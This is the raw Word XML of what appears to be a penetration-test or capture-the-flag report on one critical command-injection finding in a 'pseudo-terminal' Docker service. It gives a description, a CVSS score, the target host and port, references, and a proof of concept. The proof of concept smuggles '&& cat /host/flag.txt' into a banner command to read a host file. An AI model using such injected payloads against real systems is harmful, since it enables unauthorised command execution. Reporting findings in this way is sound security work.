        </w:rPr>
        <w:t>CRITICAL</w:t>
      </w:r>
      <w:r w:rsidR="00BD0B0F" w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10080"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72"/>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w14:paraId="3D6B035E" w14:textId="77777777" w:rsidTr="00DB29D8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="31983824" w14:textId="77777777" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00BD0B0F" w:rsidP="00BD0B0F">
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Description:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79CD8DAD" w14:textId="434350A1" w:rsidR="00940701" w:rsidRPr="002355AE" w:rsidRDefault="00940701" w:rsidP="00F308CB">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The command injection attack defines the execution of arbitrary commands on the host operating system. This is achieved through a vulnerable application. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06203706" w14:textId="0CC23F64" w:rsidR="00940701" w:rsidRPr="002355AE" w:rsidRDefault="00940701" w:rsidP="00940701">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Due to an unproper or insufficient input validation the user can pass unsafe data to the system shell. For this, the attacker can supply shell commands, which are executed with the same permissions as the vulnerable application</w:t>
            </w:r>
            <w:r w:rsidR="006234C2" w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> is executed as</w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EDBEA7E" w14:textId="7298A026" w:rsidR="00940701" w:rsidRPr="002355AE" w:rsidRDefault="00F308CB" w:rsidP="00940701">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>In this case the vulnerable application expose</w:t>
            </w:r>
            <w:r w:rsidR="00940701" w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> the user the ability to chan</w:t>
            </w:r>
            <w:r w:rsidR="006234C2" w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>g</w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">e the banner that is shown to the user. This banner could be modified using the </w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>banner -s</w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> command.</w:t>
            </w:r>
            <w:r w:rsidR="00940701" w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> When user input is provided, it is sent to the shell directly without any sanitization or validation of the provided user data. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37AE8682" w14:textId="365CB709" w:rsidR="00F308CB" w:rsidRPr="002355AE" w:rsidRDefault="00940701" w:rsidP="00940701">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>An exploitation of this vulnerability can be exploited in the proof-of-concept section down below.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w14:paraId="03DDD3BF" w14:textId="77777777" w:rsidTr="00DB29D8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="4D6CF454" w14:textId="77777777" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00BD0B0F" w:rsidP="00BD0B0F">
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Impact:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3444B131" w14:textId="77777777" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="008944EF" w:rsidP="00BD0B0F">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
            <w:r w:rsidR="00F308CB" w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> (9.8) </w:t>
            </w:r>
            <w:r w:rsidR="00E76A10" w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>|</w:t>
            </w:r>
            <w:r w:rsidR="00F308CB" w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId9" w:anchor="CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" w:history="1">
              <w:r w:rsidR="00F308CB" w:rsidRPr="002355AE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:cs="Times New Roman"/>
                  <w:b/>
                  <w:bCs/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CVSS:3.1/AV:N/A</w:t>
              </w:r>
              <w:r w:rsidR="00F308CB" w:rsidRPr="002355AE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:cs="Times New Roman"/>
                  <w:b/>
                  <w:bCs/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>C</w:t>
              </w:r>
              <w:r w:rsidR="00F308CB" w:rsidRPr="002355AE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:cs="Times New Roman"/>
                  <w:b/>
                  <w:bCs/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>:L/PR:N/UI:N/S:U/C:H/I</w:t>
              </w:r>
              <w:r w:rsidR="00F308CB" w:rsidRPr="002355AE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:cs="Times New Roman"/>
                  <w:b/>
                  <w:bCs/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidR="00F308CB" w:rsidRPr="002355AE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:cs="Times New Roman"/>
                  <w:b/>
                  <w:bCs/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>H/A:H</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="67E629C8" w14:textId="526D8027" w:rsidR="00FA5639" w:rsidRPr="002355AE" w:rsidRDefault="00FA5639" w:rsidP="0035074C">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>This vulnerability can be exploited fully remote without any prior knowledge of the underlying system, nor any credentials needed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w14:paraId="2DEC25AD" w14:textId="77777777" w:rsidTr="00DB29D8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="7011040D" w14:textId="77777777" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00BD0B0F" w:rsidP="00BD0B0F">
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>System:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D09A9F0" w14:textId="1977B6B9" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00F308CB" w:rsidP="00BD0B0F">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Docker container for application “</w:t>
            </w:r>
            <w:r w:rsidR="00E76A10" w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>pseudo-terminal</w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="Gitternetztabelle4Akzent2"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="4668"/>
              <w:gridCol w:w="1134"/>
              <w:gridCol w:w="2280"/>
            </w:tblGrid>
            <w:tr w:rsidR="00E76A10" w:rsidRPr="002355AE" w14:paraId="1D057F38" w14:textId="77777777" w:rsidTr="00F21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23A6891E" w14:textId="30ADBCB1" w:rsidR="00E76A10" w:rsidRPr="002355AE" w:rsidRDefault="00E76A10" w:rsidP="00BD0B0F">
                  <w:pPr>
                    <w:keepNext/>
                    <w:rPr>
                      <w:rFonts w:cs="Times New Roman"/>
                      <w:b w:val="0"/>
                      <w:bCs w:val="0"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="002355AE">
                    <w:rPr>
                      <w:rFonts w:cs="Times New Roman"/>
                      <w:b w:val="0"/>
                      <w:bCs w:val="0"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>IP address</w:t>
                  </w:r>
                  <w:r w:rsidR="00F21847" w:rsidRPr="002355AE">
                    <w:rPr>
                      <w:rFonts w:cs="Times New Roman"/>
                      <w:b w:val="0"/>
                      <w:bCs w:val="0"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> / Host</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1134" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="46E70D67" w14:textId="0B7BD687" w:rsidR="00E76A10" w:rsidRPr="002355AE" w:rsidRDefault="00E76A10" w:rsidP="00BD0B0F">
                  <w:pPr>
                    <w:keepNext/>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r w:rsidRPr="002355AE">
                    <w:rPr>
                      <w:rFonts w:cs="Times New Roman"/>
                      <w:b w:val="0"/>
                      <w:bCs w:val="0"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Port</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2280" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="28FA1507" w14:textId="1206BC3F" w:rsidR="00E76A10" w:rsidRPr="002355AE" w:rsidRDefault="00E76A10" w:rsidP="00BD0B0F">
                  <w:pPr>
                    <w:keepNext/>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r w:rsidRPr="002355AE">
                    <w:rPr>
                      <w:rFonts w:cs="Times New Roman"/>
                      <w:b w:val="0"/>
                      <w:bCs w:val="0"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Protocol</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00E76A10" w:rsidRPr="002355AE" w14:paraId="6D962634" w14:textId="77777777" w:rsidTr="00F21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27F829A4" w14:textId="4F346036" w:rsidR="00E76A10" w:rsidRPr="002355AE" w:rsidRDefault="00E76A10" w:rsidP="00BD0B0F">
                  <w:pPr>
                    <w:keepNext/>
                    <w:rPr>
                      <w:rFonts w:cs="Times New Roman"/>
                      <w:b w:val="0"/>
                      <w:bCs w:val="0"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="002355AE">
                    <w:rPr>
                      <w:rFonts w:cs="Times New Roman"/>
                      <w:b w:val="0"/>
                      <w:bCs w:val="0"/>
                      <w:szCs w:val="24"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>13.40.105.124</w:t>
                  </w:r>
                  <w:r w:rsidR="00F21847" w:rsidRPr="002355AE">
                    <w:rPr>
                      <w:rFonts w:cs="Times New Roman"/>
                      <w:b w:val="0"/>
                      <w:bCs w:val="0"/>
                      <w:szCs w:val="24"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> / vese.com</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1134" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="76623425" w14:textId="5217EF13" w:rsidR="00E76A10" w:rsidRPr="002355AE" w:rsidRDefault="00E76A10" w:rsidP="00BD0B0F">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2355AE">
                    <w:rPr>
                      <w:rFonts w:cs="Times New Roman"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>6969</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2280" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="307758CB" w14:textId="72387702" w:rsidR="00E76A10" w:rsidRPr="002355AE" w:rsidRDefault="00E76A10" w:rsidP="00BD0B0F">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2355AE">
                    <w:rPr>
                      <w:rFonts w:cs="Times New Roman"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>TCP</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="57D5535E" w14:textId="0B3A671B" w:rsidR="006234C2" w:rsidRPr="002355AE" w:rsidRDefault="006234C2" w:rsidP="00BD0B0F">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w14:paraId="02B3BE4A" w14:textId="77777777" w:rsidTr="00DB29D8">
        <w:trPr>
          <w:trHeight w:val="413"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="576E203C" w14:textId="77777777" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00BD0B0F" w:rsidP="00BD0B0F">
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>References:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EBBEA92" w14:textId="687F4E9A" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00714C45" w:rsidP="006234C2">
            <w:pPr>
              <w:pStyle w:val="Listenabsatz"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP Command Injection: </w:t>
            </w:r>
            <w:hyperlink r:id="rId10" w:history="1">
              <w:r w:rsidRPr="002355AE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:cs="Times New Roman"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>https://owasp.org/www-community/attacks/Command_Injection</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36D77517" w14:textId="76F76161" w:rsidR="00714C45" w:rsidRPr="002355AE" w:rsidRDefault="00714C45" w:rsidP="006234C2">
            <w:pPr>
              <w:pStyle w:val="Listenabsatz"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>PortSwigger</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> OS command injection: </w:t>
            </w:r>
            <w:hyperlink r:id="rId11" w:history="1">
              <w:r w:rsidRPr="002355AE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:cs="Times New Roman"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>https://portswigger.net/web-security/os-command-injection</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4497C292" w14:textId="77777777" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00BD0B0F" w:rsidP="00BD0B0F">
      <w:pPr>
        <w:pStyle w:val="BodyBlockLine"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D1042E5" w14:textId="77777777" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00BD0B0F" w:rsidP="00BD0B0F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exploitation Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D84B251" w14:textId="26D39815"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 xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="00940701">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFC000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">telnet </w:t>
      </w:r>
      <w:r w:rsidRPr="00940701">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="D8DEE9"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>13.40.105.124 6969</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B9863A" w14:textId="555145E6"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w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="D8DEE9"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
      <w:r w:rsidRPr="00940701">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="D8DEE9"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165F0669"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5623" w:themeColor="accent6" w:themeShade="80"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00940701">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="D8DEE9"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; banner -s flag </w:t>
      </w:r>
      <w:r w:rsidRPr="00940701">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="F4B083" w:themeColor="accent2" w:themeTint="99"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>&amp;&amp; cat /host/flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5685AB7B"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 xml:space="preserve">Banner set </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00940701">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="D8DEE9"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>to  flag</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00940701">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="D8DEE9"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp;&amp; cat /host/flag.txt correctly. Run `banner` again to display.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61107682"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&gt; banner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9F377C"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 xml:space="preserve">  __ _             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A207D38"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 xml:space="preserve"> / _| | __ _  __ _ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7099C5"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 |_| |/ _` |/ _` |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C7FEE5"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  _| | (_| | (_| |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388A7959"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|_| |_|\__,_|\__, |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335E2339"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 xml:space="preserve">             |___/ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7A1E05"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4B083" w:themeColor="accent2" w:themeTint="99"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00940701">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="F4B083" w:themeColor="accent2" w:themeTint="99"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">Key: </w:t>
      </w:r>
